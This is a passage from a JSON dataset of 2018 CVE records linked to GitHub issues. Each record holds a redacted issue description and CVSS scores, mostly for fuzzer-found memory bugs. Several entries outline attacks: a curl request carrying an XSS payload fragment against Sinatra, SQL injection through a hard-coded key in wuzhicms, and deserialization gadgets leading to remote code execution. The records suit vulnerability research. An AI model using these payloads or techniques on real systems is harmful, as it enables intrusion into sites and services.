  20011. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1420",
  20012. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1420",
  20013. "Repo_new": "espruino/espruino",
  20014. "Issue_Created_At": "2018-05-18T05:53:47Z",
  20015. "description": "Invalid read on APITAG We found with our fuzzer on Linu NUMBERTAG bit an invalid read error on a null pointer in APITAG APITAG It seems that it results from a failed sanity check on array buffer. Address sanitizer output: ERRORTAG crash input files: FILETAG FILETAG",
  20016. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20017. "severity": "MEDIUM",
  20018. "baseScore": 5.5,
  20019. "impactScore": 3.6,
  20020. "exploitabilityScore": 1.8
  20021. },
  20022. {
  20023. "CVE_ID": "CVE-2018-11592",
  20024. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1421",
  20025. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1421",
  20026. "Repo_new": "espruino/espruino",
  20027. "Issue_Created_At": "2018-05-18T05:59:01Z",
  20028. "description": "Invalid read on APITAG We found with our fuzzer multiple invalid read errors in APITAG APITAG Asan results are like: ERRORTAG crash input files: FILETAG FILETAG FILETAG",
  20029. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20030. "severity": "MEDIUM",
  20031. "baseScore": 5.5,
  20032. "impactScore": 3.6,
  20033. "exploitabilityScore": 1.8
  20034. },
  20035. {
  20036. "CVE_ID": "CVE-2018-11593",
  20037. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1426",
  20038. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1426",
  20039. "Repo_new": "espruino/espruino",
  20040. "Issue_Created_At": "2018-05-19T07:29:01Z",
  20041. "description": "stack buffer overflows during exception handling. We found with our fuzzer some stack buffer overflows during error handling. ERRORTAG sampe input files: FILETAG FILETAG",
  20042. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20043. "severity": "HIGH",
  20044. "baseScore": 7.1,
  20045. "impactScore": 5.2,
  20046. "exploitabilityScore": 1.8
  20047. },
  20048. {
  20049. "CVE_ID": "CVE-2018-11594",
  20050. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1434",
  20051. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1434",
  20052. "Repo_new": "espruino/espruino",
  20053. "Issue_Created_At": "2018-05-21T13:06:46Z",
  20054. "description": "Stack overflow error. We found another stack overflow error on APITAG that is different from NUMBERTAG The input file is rather contrived (due to fuzzing) but it can be triggered without address sanitizer. sample input file: FILETAG gdb backtrace: ERRORTAG gdb backtrace file (full): FILETAG",
  20055. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20056. "severity": "MEDIUM",
  20057. "baseScore": 5.5,
  20058. "impactScore": 3.6,
  20059. "exploitabilityScore": 1.8
  20060. },
  20061. {
  20062. "CVE_ID": "CVE-2018-11595",
  20063. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1425",
  20064. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1425",
  20065. "Repo_new": "espruino/espruino",
  20066. "Issue_Created_At": "2018-05-19T06:56:46Z",
  20067. "description": "multiple stack buffer overflows inside jslex parsing. We found with our fuzzer several buffer overflow errors that can be triggered with address sanitizer. Please see the following for details.",
  20068. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20069. "severity": "HIGH",
  20070. "baseScore": 7.8,
  20071. "impactScore": 5.9,
  20072. "exploitabilityScore": 1.8
  20073. },
  20074. {
  20075. "CVE_ID": "CVE-2018-11596",
  20076. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1435",
  20077. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1435",
  20078. "Repo_new": "espruino/espruino",
  20079. "Issue_Created_At": "2018-05-21T14:20:24Z",
  20080. "description": "stack buffer over flow inside APITAG We found some buffer overflows against commit APITAG in APITAG APITAG with address sanitizer. Till now, all these crashes involve the arrow function parsing. We haven't digged into the root cause yet, but we reduced the test input as: APITAG The error output is like: ERRORTAG",
  20081. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20082. "severity": "MEDIUM",
  20083. "baseScore": 5.5,
  20084. "impactScore": 3.6,
  20085. "exploitabilityScore": 1.8
  20086. },
  20087. {
  20088. "CVE_ID": "CVE-2018-11597",
  20089. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1448",
  20090. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1448",
  20091. "Repo_new": "espruino/espruino",
  20092. "Issue_Created_At": "2018-05-27T06:39:27Z",
  20093. "description": "Stack over flow error with certain number of \"{\" in input file. When there are certain number of continuous \"{\" inside input file, it may cause some stackoverflows. For example, on my machine APITAG NUMBERTAG when compiled with address sanitizer, espruino emits stack overflow when there are NUMBERTAG continuous \"{\" in the input files. This was actually observed by our fuzzer in Espruino's older versions several times, but we didn't reproduce with vanilla address sanitizer. We wrote the following simple script to generate the input and finally reproduced it on APITAG CODETAG",
  20094. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20095. "severity": "MEDIUM",
  20096. "baseScore": 5.5,
  20097. "impactScore": 3.6,
  20098. "exploitabilityScore": 1.8
  20099. },
  20100. {
  20101. "CVE_ID": "CVE-2018-11598",
  20102. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1437",
  20103. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1437",
  20104. "Repo_new": "espruino/espruino",
  20105. "Issue_Created_At": "2018-05-22T09:46:38Z",
  20106. "description": "Different errors in APITAG We found with our fuzzer several different errors relevant to calculation of APITAG when calling APITAG in jsvar.c. We tested on ce NUMBERTAG but also reproduced them in APITAG and these errors can be triggered in a normal run without address sanitizer. FILETAG This leads to an invalid read. ERRORTAG FILETAG This leads to an infinite loop. FILETAG This calculates a weird pointer address. ERRORTAG",
  20107. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20108. "severity": "HIGH",
  20109. "baseScore": 7.1,
  20110. "impactScore": 5.2,
  20111. "exploitabilityScore": 1.8
  20112. },
  20113. {
  20114. "CVE_ID": "CVE-2018-11625",
  20115. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1156",
  20116. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1156",
  20117. "Repo_new": "imagemagick/imagemagick",
  20118. "Issue_Created_At": "2018-05-30T07:36:02Z",
  20119. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG It will cause heap overflow when convert the POC to other APITAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  20120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20121. "severity": "HIGH",
  20122. "baseScore": 8.8,
  20123. "impactScore": 5.9,
  20124. "exploitabilityScore": 2.8
  20125. },
  20126. {
  20127. "CVE_ID": "CVE-2018-11627",
  20128. "Issue_Url_old": "https://github.com/sinatra/sinatra/issues/1428",
  20129. "Issue_Url_new": "https://github.com/sinatra/sinatra/issues/1428",
  20130. "Repo_new": "sinatra/sinatra",
  20131. "Issue_Created_At": "2018-05-22T08:59:02Z",
  20132. "description": "XSS from params parser exception (status code NUMBERTAG source at : URLTAG def params super rescue ERRORTAG ERRORTAG => e raise APITAG APITAG query parameters: {e.message}\" end demo code server.rb require 'sinatra' yes ... it empty just require sinatra gem call curl like curl i ' URLTAG data $'\" %x\\ > APITAG alert NUMBERTAG APITAG \"' return HTTP NUMBERTAG Bad Request Content Type: text/html;charset=utf NUMBERTAG SS Protection NUMBERTAG mode=block X Content Type Options: nosniff X Frame Options: SAMEORIGIN Content Length NUMBERTAG Invalid query parameters: invalid % encoding (\" %x > APITAG alert NUMBERTAG APITAG \") I know it NUMBERTAG but the error message can be HTML ...",
  20133. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20134. "severity": "MEDIUM",
  20135. "baseScore": 6.1,
  20136. "impactScore": 2.7,
  20137. "exploitabilityScore": 2.8
  20138. },
  20139. {
  20140. "CVE_ID": "CVE-2018-11655",
  20141. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/930",
  20142. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/930",
  20143. "Repo_new": "imagemagick/imagemagick",
  20144. "Issue_Created_At": "2018-01-04T07:51:35Z",
  20145. "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  20146. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20147. "severity": "MEDIUM",
  20148. "baseScore": 6.5,
  20149. "impactScore": 3.6,
  20150. "exploitabilityScore": 2.8
  20151. },
  20152. {
  20153. "CVE_ID": "CVE-2018-11656",
  20154. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/931",
  20155. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/931",
  20156. "Repo_new": "imagemagick/imagemagick",
  20157. "Issue_Created_At": "2018-01-04T07:55:45Z",
  20158. "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  20159. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20160. "severity": "MEDIUM",
  20161. "baseScore": 6.5,
  20162. "impactScore": 3.6,
  20163. "exploitabilityScore": 2.8
  20164. },
  20165. {
  20166. "CVE_ID": "CVE-2018-11657",
  20167. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/7",
  20168. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/7",
  20169. "Repo_new": "miniupnp/ngiflib",
  20170. "Issue_Created_At": "2018-06-01T03:49:40Z",
  20171. "description": "dos an infinite loop ngiflib c NUMBERTAG in APITAG APITAG has an infinite loop if id dont match any case ,it wont break poc: FILETAG",
  20172. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20173. "severity": "HIGH",
  20174. "baseScore": 7.5,
  20175. "impactScore": 3.6,
  20176. "exploitabilityScore": 3.9
  20177. },
  20178. {
  20179. "CVE_ID": "CVE-2018-11670",
  20180. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/108",
  20181. "Issue_Url_new": "https://github.com/greencms/greencms/issues/108",
  20182. "Repo_new": "greencms/greencms",
  20183. "Issue_Created_At": "2018-06-01T14:52:13Z",
  20184. "description": "APITAG APITAG \u4ece\u800c\u83b7\u53d6\u7f51\u7ad9webshell \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
  20185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20186. "severity": "HIGH",
  20187. "baseScore": 8.8,
  20188. "impactScore": 5.9,
  20189. "exploitabilityScore": 2.8
  20190. },
  20191. {
  20192. "CVE_ID": "CVE-2018-11671",
  20193. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/109",
  20194. "Issue_Url_new": "https://github.com/greencms/greencms/issues/109",
  20195. "Repo_new": "greencms/greencms",
  20196. "Issue_Created_At": "2018-06-01T14:53:42Z",
  20197. "description": "APITAG APITAG \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
  20198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20199. "severity": "HIGH",
  20200. "baseScore": 8.8,
  20201. "impactScore": 5.9,
  20202. "exploitabilityScore": 2.8
  20203. },
  20204. {
  20205. "CVE_ID": "CVE-2018-11683",
  20206. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/591",
  20207. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/591",
  20208. "Repo_new": "liblouis/liblouis",
  20209. "Issue_Created_At": "2018-06-01T23:07:42Z",
  20210. "description": "ASAn stack based buffer overflow in APITAG line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20212. "severity": "HIGH",
  20213. "baseScore": 8.8,
  20214. "impactScore": 5.9,
  20215. "exploitabilityScore": 2.8
  20216. },
  20217. {
  20218. "CVE_ID": "CVE-2018-11684",
  20219. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/592",
  20220. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/592",
  20221. "Repo_new": "liblouis/liblouis",
  20222. "Issue_Created_At": "2018-06-01T23:59:33Z",
  20223. "description": "ASAn stack based buffer overflow in APITAG in line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20225. "severity": "HIGH",
  20226. "baseScore": 8.8,
  20227. "impactScore": 5.9,
  20228. "exploitabilityScore": 2.8
  20229. },
  20230. {
  20231. "CVE_ID": "CVE-2018-11685",
  20232. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/593",
  20233. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/593",
  20234. "Repo_new": "liblouis/liblouis",
  20235. "Issue_Created_At": "2018-06-02T11:14:59Z",
  20236. "description": "ASAn stack based buffer overflow in APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20238. "severity": "HIGH",
  20239. "baseScore": 8.8,
  20240. "impactScore": 5.9,
  20241. "exploitabilityScore": 2.8
  20242. },
  20243. {
  20244. "CVE_ID": "CVE-2018-11693",
  20245. "Issue_Url_old": "https://github.com/sass/libsass/issues/2661",
  20246. "Issue_Url_new": "https://github.com/sass/libsass/issues/2661",
  20247. "Repo_new": "sass/libsass",
  20248. "Issue_Created_At": "2018-06-03T01:41:59Z",
  20249. "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20251. "severity": "HIGH",
  20252. "baseScore": 8.1,
  20253. "impactScore": 5.2,
  20254. "exploitabilityScore": 2.8
  20255. },
  20256. {
  20257. "CVE_ID": "CVE-2018-11695",
  20258. "Issue_Url_old": "https://github.com/sass/libsass/issues/2664",
  20259. "Issue_Url_new": "https://github.com/sass/libsass/issues/2664",
  20260. "Repo_new": "sass/libsass",
  20261. "Issue_Created_At": "2018-06-03T02:31:46Z",
  20262. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG through to FILETAG and then re introduced in the commit APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20264. "severity": "HIGH",
  20265. "baseScore": 8.8,
  20266. "impactScore": 5.9,
  20267. "exploitabilityScore": 2.8
  20268. },
  20269. {
  20270. "CVE_ID": "CVE-2018-11696",
  20271. "Issue_Url_old": "https://github.com/sass/libsass/issues/2665",
  20272. "Issue_Url_new": "https://github.com/sass/libsass/issues/2665",
  20273. "Repo_new": "sass/libsass",
  20274. "Issue_Created_At": "2018-06-03T02:39:40Z",
  20275. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
  20276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20277. "severity": "HIGH",
  20278. "baseScore": 8.8,
  20279. "impactScore": 5.9,
  20280. "exploitabilityScore": 2.8
  20281. },
  20282. {
  20283. "CVE_ID": "CVE-2018-11697",
  20284. "Issue_Url_old": "https://github.com/sass/libsass/issues/2656",
  20285. "Issue_Url_new": "https://github.com/sass/libsass/issues/2656",
  20286. "Repo_new": "sass/libsass",
  20287. "Issue_Created_At": "2018-06-02T00:13:09Z",
  20288. "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered an out of bands read (OOB) in libsass at: PATHTAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from NUMBERTAG to NUMBERTAG and the most recent HEAD. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report can be found FILETAG (symbols names too long to bother showing). ERRORTAG",
  20289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20290. "severity": "HIGH",
  20291. "baseScore": 8.1,
  20292. "impactScore": 5.2,
  20293. "exploitabilityScore": 2.8
  20294. },
  20295. {
  20296. "CVE_ID": "CVE-2018-11698",
  20297. "Issue_Url_old": "https://github.com/sass/libsass/issues/2662",
  20298. "Issue_Url_new": "https://github.com/sass/libsass/issues/2662",
  20299. "Repo_new": "sass/libsass",
  20300. "Issue_Created_At": "2018-06-03T01:54:30Z",
  20301. "description": "APITAG heap buffer overflow (OOB read) in Sass::handle_error ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20303. "severity": "HIGH",
  20304. "baseScore": 8.1,
  20305. "impactScore": 5.2,
  20306. "exploitabilityScore": 2.8
  20307. },
  20308. {
  20309. "CVE_ID": "CVE-2018-11722",
  20310. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/141",
  20311. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/141",
  20312. "Repo_new": "wuzhicms/wuzhicms",
  20313. "Issue_Created_At": "2018-06-04T03:09:01Z",
  20314. "description": "wuzhicms FILETAG SQL Injection Vulnerability. wuzhicms FILETAG SQL Injection Vulnerability ========================== Advisory: wuzhicms FILETAG SQL Injection Vulnerability Author: snake.jin MENTIONTAG Affected Version: Latest NUMBERTAG ulnerability Description Recetly, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'. Vulnerable cgi: FILETAG ERRORTAG As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection. Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => APITAG So we can use the code below to calculate the 'code' value: CODETAG ========================== POC && EXP URLTAG APITAG parameter 'code' value depends on the web server time. FILETAG Just enjoy it!",
  20315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20316. "severity": "CRITICAL",
  20317. "baseScore": 9.8,
  20318. "impactScore": 5.9,
  20319. "exploitabilityScore": 3.9
  20320. },
  20321. {
  20322. "CVE_ID": "CVE-2018-11734",
  20323. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3170",
  20324. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3170",
  20325. "Repo_new": "e107inc/e107",
  20326. "Issue_Created_At": "2018-06-04T04:45:19Z",
  20327. "description": "Output without filtering results in xss filtering. Website Background article insert payload FILETAG front end FILETAG Packet capture found no httponly FILETAG",
  20328. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20329. "severity": "MEDIUM",
  20330. "baseScore": 6.1,
  20331. "impactScore": 2.7,
  20332. "exploitabilityScore": 2.8
  20333. },
  20334. {
  20335. "CVE_ID": "CVE-2018-11736",
  20336. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/61",
  20337. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/61",
  20338. "Repo_new": "pluck-cms/pluck",
  20339. "Issue_Created_At": "2018-05-31T04:15:42Z",
  20340. "description": "File upload vuln APITAG An issue was discovered in Pluck before NUMBERTAG Remote PHP code execution is possible. Do you hava a email? I send details to it.",
  20341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20342. "severity": "CRITICAL",
  20343. "baseScore": 9.8,
  20344. "impactScore": 5.9,
  20345. "exploitabilityScore": 3.9
  20346. },
  20347. {
  20348. "CVE_ID": "CVE-2018-11737",
  20349. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1266",
  20350. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1266",
  20351. "Repo_new": "sleuthkit/sleuthkit",
  20352. "Issue_Created_At": "2018-06-03T13:32:43Z",
  20353. "description": "APITAG out of bounds unmapped memory access in ntfs_fix_idxrec ( PATHTAG ). Hey there, I have discovered an unmapped memory access in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a POC that triggers the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20355. "severity": "HIGH",
  20356. "baseScore": 8.1,
  20357. "impactScore": 5.2,
  20358. "exploitabilityScore": 2.8
  20359. },
  20360. {
  20361. "CVE_ID": "CVE-2018-11738",
  20362. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1265",
  20363. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1265",
  20364. "Repo_new": "sleuthkit/sleuthkit",
  20365. "Issue_Created_At": "2018-06-03T13:31:44Z",
  20366. "description": "APITAG out of bounds read (OOB) in ntfs_make_data_run ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
  20367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20368. "severity": "HIGH",
  20369. "baseScore": 8.1,
  20370. "impactScore": 5.2,
  20371. "exploitabilityScore": 2.8
  20372. },
  20373. {
  20374. "CVE_ID": "CVE-2018-11739",
  20375. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1267",
  20376. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1267",
  20377. "Repo_new": "sleuthkit/sleuthkit",
  20378. "Issue_Created_At": "2018-06-03T13:33:35Z",
  20379. "description": "APITAG out of bounds read (OOB) in raw_read ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20381. "severity": "HIGH",
  20382. "baseScore": 8.1,
  20383. "impactScore": 5.2,
  20384. "exploitabilityScore": 2.8
  20385. },
  20386. {
  20387. "CVE_ID": "CVE-2018-11740",
  20388. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1264",
  20389. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1264",
  20390. "Repo_new": "sleuthkit/sleuthkit",
  20391. "Issue_Created_At": "2018-06-03T03:45:46Z",
  20392. "description": "APITAG out of bounds read (OOB) in APITAG ( PATHTAG ). Hey there, I have discovered a one byte out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG until the recent commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20394. "severity": "HIGH",
  20395. "baseScore": 8.1,
  20396. "impactScore": 5.2,
  20397. "exploitabilityScore": 2.8
  20398. },
  20399. {
  20400. "CVE_ID": "CVE-2018-11743",
  20401. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4027",
  20402. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4027",
  20403. "Repo_new": "mruby/mruby",
  20404. "Issue_Created_At": "2018-05-28T21:58:48Z",
  20405. "description": "Use of uninitialized pointer in mrb_hash_keys. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, and Tigist Abera ( URLTAG",
  20406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20407. "severity": "CRITICAL",
  20408. "baseScore": 9.8,
  20409. "impactScore": 5.9,
  20410. "exploitabilityScore": 3.9
  20411. },
  20412. {
  20413. "CVE_ID": "CVE-2018-12022",
  20414. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2052",
  20415. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2052",
  20416. "Repo_new": "fasterxml/jackson-databind",
  20417. "Issue_Created_At": "2018-05-29T20:03:23Z",
  20418. "description": "CVE (id to be allocated): LDAP backed data source gadgets. Another approach to Default Typing vector is via data source definitions that allow passing LDAP url. There are NUMBERTAG reported gadgets covered under this particular issue.",
  20419. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20420. "severity": "HIGH",
  20421. "baseScore": 7.5,
  20422. "impactScore": 5.9,
  20423. "exploitabilityScore": 1.6
  20424. },
  20425. {
  20426. "CVE_ID": "CVE-2018-12023",
  20427. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2058",
  20428. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2058",
  20429. "Repo_new": "fasterxml/jackson-databind",
  20430. "Issue_Created_At": "2018-06-08T05:30:38Z",
  20431. "description": "CVETAG : Block polymorphic deserialization of types from Oracle JDBC driver. There is a potential remote code execution (RCE) vulnerability, if user is NUMBERTAG handling untrusted content (where attacker can craft JSON NUMBERTAG using APITAG Typing\" feature (or equivalent; polymorphic value with base type of APITAG NUMBERTAG has oracle JDBC driver jar in classpath NUMBERTAG allows connections from service to untrusted hosts (where attacker can run an LDAP service) (note: steps NUMBERTAG and NUMBERTAG are common steps as explained in URLTAG To solve the issue NUMBERTAG types from JDBC driver are blacklisted to avoid their use as \"serialization gadgets\".",
